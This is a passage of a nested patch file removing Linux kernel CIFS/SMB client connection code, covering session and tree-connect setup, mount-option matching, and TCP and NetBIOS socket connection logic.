+-		if (cifs_chan_needs_reconnect(ses, server)) {
+-			spin_unlock(&ses->chan_lock);
+-			cifs_dbg(FYI, "Session needs reconnect\n");
+-
+-			mutex_lock(&ses->session_mutex);
+-			rc = cifs_negotiate_protocol(xid, ses, server);
+-			if (rc) {
+-				mutex_unlock(&ses->session_mutex);
+-				/* problem -- put our ses reference */
+-				cifs_put_smb_ses(ses);
+-				free_xid(xid);
+-				return ERR_PTR(rc);
+-			}
+-
+-			rc = cifs_setup_session(xid, ses, server,
+-						ctx->local_nls);
+-			if (rc) {
+-				mutex_unlock(&ses->session_mutex);
+-				/* problem -- put our reference */
+-				cifs_put_smb_ses(ses);
+-				free_xid(xid);
+-				return ERR_PTR(rc);
+-			}
+-			mutex_unlock(&ses->session_mutex);
+-
+-			spin_lock(&ses->chan_lock);
+-		}
+-		spin_unlock(&ses->chan_lock);
+-
+-		/* existing SMB ses has a server reference already */
+-		cifs_put_tcp_session(server, 0);
+-		free_xid(xid);
+-		return ses;
+-	}
+-
+-	rc = -ENOMEM;
+-
+-	cifs_dbg(FYI, "Existing smb sess not found\n");
+-	ses = sesInfoAlloc();
+-	if (ses == NULL)
+-		goto get_ses_fail;
+-
+-	/* new SMB session uses our server ref */
+-	ses->server = server;
+-	if (server->dstaddr.ss_family == AF_INET6)
+-		sprintf(ses->ip_addr, "%pI6", &addr6->sin6_addr);
+-	else
+-		sprintf(ses->ip_addr, "%pI4", &addr->sin_addr);
+-
+-	if (ctx->username) {
+-		ses->user_name = kstrdup(ctx->username, GFP_KERNEL);
+-		if (!ses->user_name)
+-			goto get_ses_fail;
+-	}
+-
+-	/* ctx->password freed at unmount */
+-	if (ctx->password) {
+-		ses->password = kstrdup(ctx->password, GFP_KERNEL);
+-		if (!ses->password)
+-			goto get_ses_fail;
+-	}
+-	if (ctx->domainname) {
+-		ses->domainName = kstrdup(ctx->domainname, GFP_KERNEL);
+-		if (!ses->domainName)
+-			goto get_ses_fail;
+-	}
+-
+-	strscpy(ses->workstation_name, ctx->workstation_name, sizeof(ses->workstation_name));
+-
+-	if (ctx->domainauto)
+-		ses->domainAuto = ctx->domainauto;
+-	ses->cred_uid = ctx->cred_uid;
+-	ses->linux_uid = ctx->linux_uid;
+-
+-	ses->sectype = ctx->sectype;
+-	ses->sign = ctx->sign;
+-
+-	/* add server as first channel */
+-	spin_lock(&ses->chan_lock);
+-	ses->chans[0].server = server;
+-	ses->chan_count = 1;
+-	ses->chan_max = ctx->multichannel ? ctx->max_channels:1;
+-	ses->chans_need_reconnect = 1;
+-	spin_unlock(&ses->chan_lock);
+-
+-	mutex_lock(&ses->session_mutex);
+-	rc = cifs_negotiate_protocol(xid, ses, server);
+-	if (!rc)
+-		rc = cifs_setup_session(xid, ses, server, ctx->local_nls);
+-	mutex_unlock(&ses->session_mutex);
+-
+-	/* each channel uses a different signing key */
+-	spin_lock(&ses->chan_lock);
+-	memcpy(ses->chans[0].signkey, ses->smb3signingkey,
+-	       sizeof(ses->smb3signingkey));
+-	spin_unlock(&ses->chan_lock);
+-
+-	if (rc)
+-		goto get_ses_fail;
+-
+-	/*
+-	 * success, put it on the list and add it as first channel
+-	 * note: the session becomes active soon after this. So you'll
+-	 * need to lock before changing something in the session.
+-	 */
+-	spin_lock(&cifs_tcp_ses_lock);
+-	list_add(&ses->smb_ses_list, &server->smb_ses_list);
+-	spin_unlock(&cifs_tcp_ses_lock);
+-
+-	cifs_setup_ipc(ses, ctx);
+-
+-	free_xid(xid);
+-
+-	return ses;
+-
+-get_ses_fail:
+-	sesInfoFree(ses);
+-	free_xid(xid);
+-	return ERR_PTR(rc);
+-}
+-
+-/* this function must be called with tc_lock held */
+-static int match_tcon(struct cifs_tcon *tcon, struct smb3_fs_context *ctx)
+-{
+-	if (tcon->status == TID_EXITING)
+-		return 0;
+-	if (strncmp(tcon->tree_name, ctx->UNC, MAX_TREE_SIZE))
+-		return 0;
+-	if (tcon->seal != ctx->seal)
+-		return 0;
+-	if (tcon->snapshot_time != ctx->snapshot_time)
+-		return 0;
+-	if (tcon->handle_timeout != ctx->handle_timeout)
+-		return 0;
+-	if (tcon->no_lease != ctx->no_lease)
+-		return 0;
+-	if (tcon->nodelete != ctx->nodelete)
+-		return 0;
+-	return 1;
+-}
+-
+-static struct cifs_tcon *
+-cifs_find_tcon(struct cifs_ses *ses, struct smb3_fs_context *ctx)
+-{
+-	struct cifs_tcon *tcon;
+-
+-	spin_lock(&cifs_tcp_ses_lock);
+-	list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
+-		spin_lock(&tcon->tc_lock);
+-		if (!match_tcon(tcon, ctx)) {
+-			spin_unlock(&tcon->tc_lock);
+-			continue;
+-		}
+-		++tcon->tc_count;
+-		spin_unlock(&tcon->tc_lock);
+-		spin_unlock(&cifs_tcp_ses_lock);
+-		return tcon;
+-	}
+-	spin_unlock(&cifs_tcp_ses_lock);
+-	return NULL;
+-}
+-
+-void
+-cifs_put_tcon(struct cifs_tcon *tcon)
+-{
+-	unsigned int xid;
+-	struct cifs_ses *ses;
+-
+-	/*
+-	 * IPC tcon share the lifetime of their session and are
+-	 * destroyed in the session put function
+-	 */
+-	if (tcon == NULL || tcon->ipc)
+-		return;
+-
+-	ses = tcon->ses;
+-	cifs_dbg(FYI, "%s: tc_count=%d\n", __func__, tcon->tc_count);
+-	spin_lock(&cifs_tcp_ses_lock);
+-	spin_lock(&tcon->tc_lock);
+-	if (--tcon->tc_count > 0) {
+-		spin_unlock(&tcon->tc_lock);
+-		spin_unlock(&cifs_tcp_ses_lock);
+-		return;
+-	}
+-
+-	/* tc_count can never go negative */
+-	WARN_ON(tcon->tc_count < 0);
+-
+-	list_del_init(&tcon->tcon_list);
+-	tcon->status = TID_EXITING;
+-	spin_unlock(&tcon->tc_lock);
+-	spin_unlock(&cifs_tcp_ses_lock);
+-
+-	/* cancel polling of interfaces */
+-	cancel_delayed_work_sync(&tcon->query_interfaces);
+-
+-	if (tcon->use_witness) {
+-		int rc;
+-
+-		rc = cifs_swn_unregister(tcon);
+-		if (rc < 0) {
+-			cifs_dbg(VFS, "%s: Failed to unregister for witness notifications: %d\n",
+-					__func__, rc);
+-		}
+-	}
+-
+-	xid = get_xid();
+-	if (ses->server->ops->tree_disconnect)
+-		ses->server->ops->tree_disconnect(xid, tcon);
+-	_free_xid(xid);
+-
+-	cifs_fscache_release_super_cookie(tcon);
+-	tconInfoFree(tcon);
+-	cifs_put_smb_ses(ses);
+-}
+-
+-/**
+- * cifs_get_tcon - get a tcon matching @ctx data from @ses
+- * @ses: smb session to issue the request on
+- * @ctx: the superblock configuration context to use for building the
+- *
+- * - tcon refcount is the number of mount points using the tcon.
+- * - ses refcount is the number of tcon using the session.
+- *
+- * 1. This function assumes it is being called from cifs_mount() where
+- *    we already got a session reference (ses refcount +1).
+- *
+- * 2. Since we're in the context of adding a mount point, the end
+- *    result should be either:
+- *
+- * a) a new tcon already allocated with refcount=1 (1 mount point) and
+- *    its session refcount incremented (1 new tcon). This +1 was
+- *    already done in (1).
+- *
+- * b) an existing tcon with refcount+1 (add a mount point to it) and
+- *    identical ses refcount (no new tcon). Because of (1) we need to
+- *    decrement the ses refcount.
+- */
+-static struct cifs_tcon *
+-cifs_get_tcon(struct cifs_ses *ses, struct smb3_fs_context *ctx)
+-{
+-	int rc, xid;
+-	struct cifs_tcon *tcon;
+-
+-	tcon = cifs_find_tcon(ses, ctx);
+-	if (tcon) {
+-		/*
+-		 * tcon has refcount already incremented but we need to
+-		 * decrement extra ses reference gotten by caller (case b)
+-		 */
+-		cifs_dbg(FYI, "Found match on UNC path\n");
+-		cifs_put_smb_ses(ses);
+-		return tcon;
+-	}
+-
+-	if (!ses->server->ops->tree_connect) {
+-		rc = -ENOSYS;
+-		goto out_fail;
+-	}
+-
+-	tcon = tconInfoAlloc();
+-	if (tcon == NULL) {
+-		rc = -ENOMEM;
+-		goto out_fail;
+-	}
+-
+-	if (ctx->snapshot_time) {
+-		if (ses->server->vals->protocol_id == 0) {
+-			cifs_dbg(VFS,
+-			     "Use SMB2 or later for snapshot mount option\n");
+-			rc = -EOPNOTSUPP;
+-			goto out_fail;
+-		} else
+-			tcon->snapshot_time = ctx->snapshot_time;
+-	}
+-
+-	if (ctx->handle_timeout) {
+-		if (ses->server->vals->protocol_id == 0) {
+-			cifs_dbg(VFS,
+-			     "Use SMB2.1 or later for handle timeout option\n");
+-			rc = -EOPNOTSUPP;
+-			goto out_fail;
+-		} else
+-			tcon->handle_timeout = ctx->handle_timeout;
+-	}
+-
+-	tcon->ses = ses;
+-	if (ctx->password) {
+-		tcon->password = kstrdup(ctx->password, GFP_KERNEL);
+-		if (!tcon->password) {
+-			rc = -ENOMEM;
+-			goto out_fail;
+-		}
+-	}
+-
+-	if (ctx->seal) {
+-		if (ses->server->vals->protocol_id == 0) {
+-			cifs_dbg(VFS,
+-				 "SMB3 or later required for encryption\n");
+-			rc = -EOPNOTSUPP;
+-			goto out_fail;
+-		} else if (tcon->ses->server->capabilities &
+-					SMB2_GLOBAL_CAP_ENCRYPTION)
+-			tcon->seal = true;
+-		else {
+-			cifs_dbg(VFS, "Encryption is not supported on share\n");
+-			rc = -EOPNOTSUPP;
+-			goto out_fail;
+-		}
+-	}
+-
+-	if (ctx->linux_ext) {
+-		if (ses->server->posix_ext_supported) {
+-			tcon->posix_extensions = true;
+-			pr_warn_once("SMB3.11 POSIX Extensions are experimental\n");
+-		} else if ((ses->server->vals->protocol_id == SMB311_PROT_ID) ||
+-		    (strcmp(ses->server->vals->version_string,
+-		     SMB3ANY_VERSION_STRING) == 0) ||
+-		    (strcmp(ses->server->vals->version_string,
+-		     SMBDEFAULT_VERSION_STRING) == 0)) {
+-			cifs_dbg(VFS, "Server does not support mounting with posix SMB3.11 extensions\n");
+-			rc = -EOPNOTSUPP;
+-			goto out_fail;
+-		} else {
+-			cifs_dbg(VFS, "Check vers= mount option. SMB3.11 "
+-				"disabled but required for POSIX extensions\n");
+-			rc = -EOPNOTSUPP;
+-			goto out_fail;
+-		}
+-	}
+-
+-	xid = get_xid();
+-	rc = ses->server->ops->tree_connect(xid, ses, ctx->UNC, tcon,
+-					    ctx->local_nls);
+-	free_xid(xid);
+-	cifs_dbg(FYI, "Tcon rc = %d\n", rc);
+-	if (rc)
+-		goto out_fail;
+-
+-	tcon->use_persistent = false;
+-	/* check if SMB2 or later, CIFS does not support persistent handles */
+-	if (ctx->persistent) {
+-		if (ses->server->vals->protocol_id == 0) {
+-			cifs_dbg(VFS,
+-			     "SMB3 or later required for persistent handles\n");
+-			rc = -EOPNOTSUPP;
+-			goto out_fail;
+-		} else if (ses->server->capabilities &
+-			   SMB2_GLOBAL_CAP_PERSISTENT_HANDLES)
+-			tcon->use_persistent = true;
+-		else /* persistent handles requested but not supported */ {
+-			cifs_dbg(VFS,
+-				"Persistent handles not supported on share\n");
+-			rc = -EOPNOTSUPP;
+-			goto out_fail;
+-		}
+-	} else if ((tcon->capabilities & SMB2_SHARE_CAP_CONTINUOUS_AVAILABILITY)
+-	     && (ses->server->capabilities & SMB2_GLOBAL_CAP_PERSISTENT_HANDLES)
+-	     && (ctx->nopersistent == false)) {
+-		cifs_dbg(FYI, "enabling persistent handles\n");
+-		tcon->use_persistent = true;
+-	} else if (ctx->resilient) {
+-		if (ses->server->vals->protocol_id == 0) {
+-			cifs_dbg(VFS,
+-			     "SMB2.1 or later required for resilient handles\n");
+-			rc = -EOPNOTSUPP;
+-			goto out_fail;
+-		}
+-		tcon->use_resilient = true;
+-	}
+-
+-	tcon->use_witness = false;
+-	if (IS_ENABLED(CONFIG_CIFS_SWN_UPCALL) && ctx->witness) {
+-		if (ses->server->vals->protocol_id >= SMB30_PROT_ID) {
+-			if (tcon->capabilities & SMB2_SHARE_CAP_CLUSTER) {
+-				/*
+-				 * Set witness in use flag in first place
+-				 * to retry registration in the echo task
+-				 */
+-				tcon->use_witness = true;
+-				/* And try to register immediately */
+-				rc = cifs_swn_register(tcon);
+-				if (rc < 0) {
+-					cifs_dbg(VFS, "Failed to register for witness notifications: %d\n", rc);
+-					goto out_fail;
+-				}
+-			} else {
+-				/* TODO: try to extend for non-cluster uses (eg multichannel) */
+-				cifs_dbg(VFS, "witness requested on mount but no CLUSTER capability on share\n");
+-				rc = -EOPNOTSUPP;
+-				goto out_fail;
+-			}
+-		} else {
+-			cifs_dbg(VFS, "SMB3 or later required for witness option\n");
+-			rc = -EOPNOTSUPP;
+-			goto out_fail;
+-		}
+-	}
+-
+-	/* If the user really knows what they are doing they can override */
+-	if (tcon->share_flags & SMB2_SHAREFLAG_NO_CACHING) {
+-		if (ctx->cache_ro)
+-			cifs_dbg(VFS, "cache=ro requested on mount but NO_CACHING flag set on share\n");
+-		else if (ctx->cache_rw)
+-			cifs_dbg(VFS, "cache=singleclient requested on mount but NO_CACHING flag set on share\n");
+-	}
+-
+-	if (ctx->no_lease) {
+-		if (ses->server->vals->protocol_id == 0) {
+-			cifs_dbg(VFS,
+-				"SMB2 or later required for nolease option\n");
+-			rc = -EOPNOTSUPP;
+-			goto out_fail;
+-		} else
+-			tcon->no_lease = ctx->no_lease;
+-	}
+-
+-	/*
+-	 * We can have only one retry value for a connection to a share so for
+-	 * resources mounted more than once to the same server share the last
+-	 * value passed in for the retry flag is used.
+-	 */
+-	tcon->retry = ctx->retry;
+-	tcon->nocase = ctx->nocase;
+-	tcon->broken_sparse_sup = ctx->no_sparse;
+-	if (ses->server->capabilities & SMB2_GLOBAL_CAP_DIRECTORY_LEASING)
+-		tcon->nohandlecache = ctx->nohandlecache;
+-	else
+-		tcon->nohandlecache = true;
+-	tcon->nodelete = ctx->nodelete;
+-	tcon->local_lease = ctx->local_lease;
+-	INIT_LIST_HEAD(&tcon->pending_opens);
+-	tcon->status = TID_GOOD;
+-
+-	INIT_DELAYED_WORK(&tcon->query_interfaces,
+-			  smb2_query_server_interfaces);
+-	if (ses->server->dialect >= SMB30_PROT_ID &&
+-	    (ses->server->capabilities & SMB2_GLOBAL_CAP_MULTI_CHANNEL)) {
+-		/* schedule query interfaces poll */
+-		queue_delayed_work(cifsiod_wq, &tcon->query_interfaces,
+-				   (SMB_INTERFACE_POLL_INTERVAL * HZ));
+-	}
+-
+-	spin_lock(&cifs_tcp_ses_lock);
+-	list_add(&tcon->tcon_list, &ses->tcon_list);
+-	spin_unlock(&cifs_tcp_ses_lock);
+-
+-	return tcon;
+-
+-out_fail:
+-	tconInfoFree(tcon);
+-	return ERR_PTR(rc);
+-}
+-
+-void
+-cifs_put_tlink(struct tcon_link *tlink)
+-{
+-	if (!tlink || IS_ERR(tlink))
+-		return;
+-
+-	if (!atomic_dec_and_test(&tlink->tl_count) ||
+-	    test_bit(TCON_LINK_IN_TREE, &tlink->tl_flags)) {
+-		tlink->tl_time = jiffies;
+-		return;
+-	}
+-
+-	if (!IS_ERR(tlink_tcon(tlink)))
+-		cifs_put_tcon(tlink_tcon(tlink));
+-	kfree(tlink);
+-	return;
+-}
+-
+-static int
+-compare_mount_options(struct super_block *sb, struct cifs_mnt_data *mnt_data)
+-{
+-	struct cifs_sb_info *old = CIFS_SB(sb);
+-	struct cifs_sb_info *new = mnt_data->cifs_sb;
+-	unsigned int oldflags = old->mnt_cifs_flags & CIFS_MOUNT_MASK;
+-	unsigned int newflags = new->mnt_cifs_flags & CIFS_MOUNT_MASK;
+-
+-	if ((sb->s_flags & CIFS_MS_MASK) != (mnt_data->flags & CIFS_MS_MASK))
+-		return 0;
+-
+-	if (old->mnt_cifs_serverino_autodisabled)
+-		newflags &= ~CIFS_MOUNT_SERVER_INUM;
+-
+-	if (oldflags != newflags)
+-		return 0;
+-
+-	/*
+-	 * We want to share sb only if we don't specify an r/wsize or
+-	 * specified r/wsize is greater than or equal to existing one.
+-	 */
+-	if (new->ctx->wsize && new->ctx->wsize < old->ctx->wsize)
+-		return 0;
+-
+-	if (new->ctx->rsize && new->ctx->rsize < old->ctx->rsize)
+-		return 0;
+-
+-	if (!uid_eq(old->ctx->linux_uid, new->ctx->linux_uid) ||
+-	    !gid_eq(old->ctx->linux_gid, new->ctx->linux_gid))
+-		return 0;
+-
+-	if (old->ctx->file_mode != new->ctx->file_mode ||
+-	    old->ctx->dir_mode != new->ctx->dir_mode)
+-		return 0;
+-
+-	if (strcmp(old->local_nls->charset, new->local_nls->charset))
+-		return 0;
+-
+-	if (old->ctx->acregmax != new->ctx->acregmax)
+-		return 0;
+-	if (old->ctx->acdirmax != new->ctx->acdirmax)
+-		return 0;
+-	if (old->ctx->closetimeo != new->ctx->closetimeo)
+-		return 0;
+-
+-	return 1;
+-}
+-
+-static int
+-match_prepath(struct super_block *sb, struct cifs_mnt_data *mnt_data)
+-{
+-	struct cifs_sb_info *old = CIFS_SB(sb);
+-	struct cifs_sb_info *new = mnt_data->cifs_sb;
+-	bool old_set = (old->mnt_cifs_flags & CIFS_MOUNT_USE_PREFIX_PATH) &&
+-		old->prepath;
+-	bool new_set = (new->mnt_cifs_flags & CIFS_MOUNT_USE_PREFIX_PATH) &&
+-		new->prepath;
+-
+-	if (old_set && new_set && !strcmp(new->prepath, old->prepath))
+-		return 1;
+-	else if (!old_set && !new_set)
+-		return 1;
+-
+-	return 0;
+-}
+-
+-int
+-cifs_match_super(struct super_block *sb, void *data)
+-{
+-	struct cifs_mnt_data *mnt_data = data;
+-	struct smb3_fs_context *ctx;
+-	struct cifs_sb_info *cifs_sb;
+-	struct TCP_Server_Info *tcp_srv;
+-	struct cifs_ses *ses;
+-	struct cifs_tcon *tcon;
+-	struct tcon_link *tlink;
+-	int rc = 0;
+-
+-	spin_lock(&cifs_tcp_ses_lock);
+-	cifs_sb = CIFS_SB(sb);
+-
+-	/* We do not want to use a superblock that has been shutdown */
+-	if (CIFS_MOUNT_SHUTDOWN & cifs_sb->mnt_cifs_flags) {
+-		spin_unlock(&cifs_tcp_ses_lock);
+-		return 0;
+-	}
+-
+-	tlink = cifs_get_tlink(cifs_sb_master_tlink(cifs_sb));
+-	if (tlink == NULL) {
+-		/* can not match superblock if tlink were ever null */
+-		spin_unlock(&cifs_tcp_ses_lock);
+-		return 0;
+-	}
+-	tcon = tlink_tcon(tlink);
+-	ses = tcon->ses;
+-	tcp_srv = ses->server;
+-
+-	ctx = mnt_data->ctx;
+-
+-	spin_lock(&tcp_srv->srv_lock);
+-	spin_lock(&ses->ses_lock);
+-	spin_lock(&ses->chan_lock);
+-	spin_lock(&tcon->tc_lock);
+-	if (!match_server(tcp_srv, ctx) ||
+-	    !match_session(ses, ctx) ||
+-	    !match_tcon(tcon, ctx) ||
+-	    !match_prepath(sb, mnt_data)) {
+-		rc = 0;
+-		goto out;
+-	}
+-
+-	rc = compare_mount_options(sb, mnt_data);
+-out:
+-	spin_unlock(&tcon->tc_lock);
+-	spin_unlock(&ses->chan_lock);
+-	spin_unlock(&ses->ses_lock);
+-	spin_unlock(&tcp_srv->srv_lock);
+-
+-	spin_unlock(&cifs_tcp_ses_lock);
+-	cifs_put_tlink(tlink);
+-	return rc;
+-}
+-
+-#ifdef CONFIG_DEBUG_LOCK_ALLOC
+-static struct lock_class_key cifs_key[2];
+-static struct lock_class_key cifs_slock_key[2];
+-
+-static inline void
+-cifs_reclassify_socket4(struct socket *sock)
+-{
+-	struct sock *sk = sock->sk;
+-	BUG_ON(!sock_allow_reclassification(sk));
+-	sock_lock_init_class_and_name(sk, "slock-AF_INET-CIFS",
+-		&cifs_slock_key[0], "sk_lock-AF_INET-CIFS", &cifs_key[0]);
+-}
+-
+-static inline void
+-cifs_reclassify_socket6(struct socket *sock)
+-{
+-	struct sock *sk = sock->sk;
+-	BUG_ON(!sock_allow_reclassification(sk));
+-	sock_lock_init_class_and_name(sk, "slock-AF_INET6-CIFS",
+-		&cifs_slock_key[1], "sk_lock-AF_INET6-CIFS", &cifs_key[1]);
+-}
+-#else
+-static inline void
+-cifs_reclassify_socket4(struct socket *sock)
+-{
+-}
+-
+-static inline void
+-cifs_reclassify_socket6(struct socket *sock)
+-{
+-}
+-#endif
+-
+-/* See RFC1001 section 14 on representation of Netbios names */
+-static void rfc1002mangle(char *target, char *source, unsigned int length)
+-{
+-	unsigned int i, j;
+-
+-	for (i = 0, j = 0; i < (length); i++) {
+-		/* mask a nibble at a time and encode */
+-		target[j] = 'A' + (0x0F & (source[i] >> 4));
+-		target[j+1] = 'A' + (0x0F & source[i]);
+-		j += 2;
+-	}
+-
+-}
+-
+-static int
+-bind_socket(struct TCP_Server_Info *server)
+-{
+-	int rc = 0;
+-	if (server->srcaddr.ss_family != AF_UNSPEC) {
+-		/* Bind to the specified local IP address */
+-		struct socket *socket = server->ssocket;
+-		rc = socket->ops->bind(socket,
+-				       (struct sockaddr *) &server->srcaddr,
+-				       sizeof(server->srcaddr));
+-		if (rc < 0) {
+-			struct sockaddr_in *saddr4;
+-			struct sockaddr_in6 *saddr6;
+-			saddr4 = (struct sockaddr_in *)&server->srcaddr;
+-			saddr6 = (struct sockaddr_in6 *)&server->srcaddr;
+-			if (saddr6->sin6_family == AF_INET6)
+-				cifs_server_dbg(VFS, "Failed to bind to: %pI6c, error: %d\n",
+-					 &saddr6->sin6_addr, rc);
+-			else
+-				cifs_server_dbg(VFS, "Failed to bind to: %pI4, error: %d\n",
+-					 &saddr4->sin_addr.s_addr, rc);
+-		}
+-	}
+-	return rc;
+-}
+-
+-static int
+-ip_rfc1001_connect(struct TCP_Server_Info *server)
+-{
+-	int rc = 0;
+-	/*
+-	 * some servers require RFC1001 sessinit before sending
+-	 * negprot - BB check reconnection in case where second
+-	 * sessinit is sent but no second negprot
+-	 */
+-	struct rfc1002_session_packet req = {};
+-	struct smb_hdr *smb_buf = (struct smb_hdr *)&req;
+-	unsigned int len;
+-
+-	req.trailer.session_req.called_len = sizeof(req.trailer.session_req.called_name);
+-
+-	if (server->server_RFC1001_name[0] != 0)
+-		rfc1002mangle(req.trailer.session_req.called_name,
+-			      server->server_RFC1001_name,
+-			      RFC1001_NAME_LEN_WITH_NULL);
+-	else
+-		rfc1002mangle(req.trailer.session_req.called_name,
+-			      DEFAULT_CIFS_CALLED_NAME,
+-			      RFC1001_NAME_LEN_WITH_NULL);
+-
+-	req.trailer.session_req.calling_len = sizeof(req.trailer.session_req.calling_name);
+-
+-	/* calling name ends in null (byte 16) from old smb convention */
+-	if (server->workstation_RFC1001_name[0] != 0)
+-		rfc1002mangle(req.trailer.session_req.calling_name,
+-			      server->workstation_RFC1001_name,
+-			      RFC1001_NAME_LEN_WITH_NULL);
+-	else
+-		rfc1002mangle(req.trailer.session_req.calling_name,
+-			      "LINUX_CIFS_CLNT",
+-			      RFC1001_NAME_LEN_WITH_NULL);
+-
+-	/*
+-	 * As per rfc1002, @len must be the number of bytes that follows the
+-	 * length field of a rfc1002 session request payload.
+-	 */
+-	len = sizeof(req) - offsetof(struct rfc1002_session_packet, trailer.session_req);
+-
+-	smb_buf->smb_buf_length = cpu_to_be32((RFC1002_SESSION_REQUEST << 24) | len);
+-	rc = smb_send(server, smb_buf, len);
+-	/*
+-	 * RFC1001 layer in at least one server requires very short break before
+-	 * negprot presumably because not expecting negprot to follow so fast.
+-	 * This is a simple solution that works without complicating the code
+-	 * and causes no significant slowing down on mount for everyone else
+-	 */
+-	usleep_range(1000, 2000);
+-
+-	return rc;
+-}
+-
+-static int
+-generic_ip_connect(struct TCP_Server_Info *server)
+-{
+-	int rc = 0;
+-	__be16 sport;
+-	int slen, sfamily;
+-	struct socket *socket = server->ssocket;
+-	struct sockaddr *saddr;
+-
+-	saddr = (struct sockaddr *) &server->dstaddr;
+-
+-	if (server->dstaddr.ss_family == AF_INET6) {
+-		struct sockaddr_in6 *ipv6 = (struct sockaddr_in6 *)&server->dstaddr;
+-
+-		sport = ipv6->sin6_port;
+-		slen = sizeof(struct sockaddr_in6);
+-		sfamily = AF_INET6;
+-		cifs_dbg(FYI, "%s: connecting to [%pI6]:%d\n", __func__, &ipv6->sin6_addr,
+-				ntohs(sport));
+-	} else {
+-		struct sockaddr_in *ipv4 = (struct sockaddr_in *)&server->dstaddr;
+-
+-		sport = ipv4->sin_port;
+-		slen = sizeof(struct sockaddr_in);
+-		sfamily = AF_INET;
+-		cifs_dbg(FYI, "%s: connecting to %pI4:%d\n", __func__, &ipv4->sin_addr,
+-				ntohs(sport));
+-	}
+-
+-	if (socket == NULL) {
+-		rc = __sock_create(cifs_net_ns(server), sfamily, SOCK_STREAM,
+-				   IPPROTO_TCP, &socket, 1);
+-		if (rc < 0) {
+-			cifs_server_dbg(VFS, "Error %d creating socket\n", rc);
+-			server->ssocket = NULL;
+-			return rc;
+-		}
+-
+-		/* BB other socket options to set KEEPALIVE, NODELAY? */
+-		cifs_dbg(FYI, "Socket created\n");
+-		server->ssocket = socket;
+-		socket->sk->sk_allocation = GFP_NOFS;
+-		if (sfamily == AF_INET6)
+-			cifs_reclassify_socket6(socket);
+-		else
+-			cifs_reclassify_socket4(socket);
+-	}
+-
+-	rc = bind_socket(server);
+-	if (rc < 0)
+-		return rc;
+-
+-	/*
+-	 * Eventually check for other socket options to change from
+-	 * the default. sock_setsockopt not used because it expects
+-	 * user space buffer
+-	 */
+-	socket->sk->sk_rcvtimeo = 7 * HZ;
+-	socket->sk->sk_sndtimeo = 5 * HZ;
+-
+-	/* make the bufsizes depend on wsize/rsize and max requests */
+-	if (server->noautotune) {
+-		if (socket->sk->sk_sndbuf < (200 * 1024))
+-			socket->sk->sk_sndbuf = 200 * 1024;
+-		if (socket->sk->sk_rcvbuf < (140 * 1024))
+-			socket->sk->sk_rcvbuf = 140 * 1024;
+-	}
+-
+-	if (server->tcp_nodelay)
+-		tcp_sock_set_nodelay(socket->sk);
+-
+-	cifs_dbg(FYI, "sndbuf %d rcvbuf %d rcvtimeo 0x%lx\n",
+-		 socket->sk->sk_sndbuf,
+-		 socket->sk->sk_rcvbuf, socket->sk->sk_rcvtimeo);
+-
+-	rc = socket->ops->connect(socket, saddr, slen,
+-				  server->noblockcnt ? O_NONBLOCK : 0);
+-	/*
+-	 * When mounting SMB root file systems, we do not want to block in
+-	 * connect. Otherwise bail out and then let cifs_reconnect() perform
+-	 * reconnect failover - if possible.
+-	 */
+-	if (server->noblockcnt && rc == -EINPROGRESS)
+-		rc = 0;
+-	if (rc < 0) {
+-		cifs_dbg(FYI, "Error %d connecting to server\n", rc);
+-		trace_smb3_connect_err(server->hostname, server->conn_id, &server->dstaddr, rc);
+-		sock_release(socket);
+-		server->ssocket = NULL;
+-		return rc;
+-	}
+-	trace_smb3_connect_done(server->hostname, server->conn_id, &server->dstaddr);
+-	if (sport == htons(RFC1001_PORT))
+-		rc = ip_rfc1001_connect(server);
+-
+-	return rc;
+-}
+-
+-static int
+-ip_connect(struct TCP_Server_Info *server)
+-{
+-	__be16 *sport;
+-	struct sockaddr_in6 *addr6 = (struct sockaddr_in6 *)&server->dstaddr;
+-	struct sockaddr_in *addr = (struct sockaddr_in *)&server->dstaddr;
+-
+-	if (server->dstaddr.ss_family == AF_INET6)
+-		sport = &addr6->sin6_port;
+-	else
+-		sport = &addr->sin_port;
+-
+-	if (*sport == 0) {
+-		int rc;
+-
+-		/* try with 445 port at first */
+-		*sport = htons(CIFS_PORT);
+-
+-		rc = generic_ip_connect(server);
+-		if (rc >= 0)
+-			return rc;
+-
+-		/* if it failed, try with 139 port */
+-		*sport = htons(RFC1001_PORT);
+-	}
+-
+-	return generic_ip_connect(server);
+-}
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-void reset_cifs_unix_caps(unsigned int xid, struct cifs_tcon *tcon,
+-			  struct cifs_sb_info *cifs_sb, struct smb3_fs_context *ctx)
+-{
+-	/*
+-	 * If we are reconnecting then should we check to see if
+-	 * any requested capabilities changed locally e.g. via
+-	 * remount but we can not do much about it here
+-	 * if they have (even if we could detect it by the following)
+-	 * Perhaps we could add a backpointer to array of sb from tcon
+-	 * or if we change to make all sb to same share the same
+-	 * sb as NFS - then we only have one backpointer to sb.
+-	 * What if we wanted to mount the server share twice once with
+-	 * and once without posixacls or posix paths?
+-	 */
+-	__u64 saved_cap = le64_to_cpu(tcon->fsUnixInfo.Capability);
+-
+-	if (ctx && ctx->no_linux_ext) {
+-		tcon->fsUnixInfo.Capability = 0;
+-		tcon->unix_ext = 0; /* Unix Extensions disabled */
+-		cifs_dbg(FYI, "Linux protocol extensions disabled\n");
+-		return;
+-	} else if (ctx)
+-		tcon->unix_ext = 1; /* Unix Extensions supported */
+-
+-	if (!tcon->unix_ext) {
+-		cifs_dbg(FYI, "Unix extensions disabled so not set on reconnect\n");
+-		return;
+-	}
+-
+-	if (!CIFSSMBQFSUnixInfo(xid, tcon)) {
+-		__u64 cap = le64_to_cpu(tcon->fsUnixInfo.Capability);
+-		cifs_dbg(FYI, "unix caps which server supports %lld\n", cap);
+-		/*
+-		 * check for reconnect case in which we do not
+-		 * want to change the mount behavior if we can avoid it
+-		 */
+-		if (ctx == NULL) {
+-			/*
+-			 * turn off POSIX ACL and PATHNAMES if not set
+-			 * originally at mount time
+-			 */
+-			if ((saved_cap & CIFS_UNIX_POSIX_ACL_CAP) == 0)
+-				cap &= ~CIFS_UNIX_POSIX_ACL_CAP;
+-			if ((saved_cap & CIFS_UNIX_POSIX_PATHNAMES_CAP) == 0) {
+-				if (cap & CIFS_UNIX_POSIX_PATHNAMES_CAP)
+-					cifs_dbg(VFS, "POSIXPATH support change\n");
+-				cap &= ~CIFS_UNIX_POSIX_PATHNAMES_CAP;
+-			} else if ((cap & CIFS_UNIX_POSIX_PATHNAMES_CAP) == 0) {
+-				cifs_dbg(VFS, "possible reconnect error\n");
+-				cifs_dbg(VFS, "server disabled POSIX path support\n");
+-			}
+-		}
+-
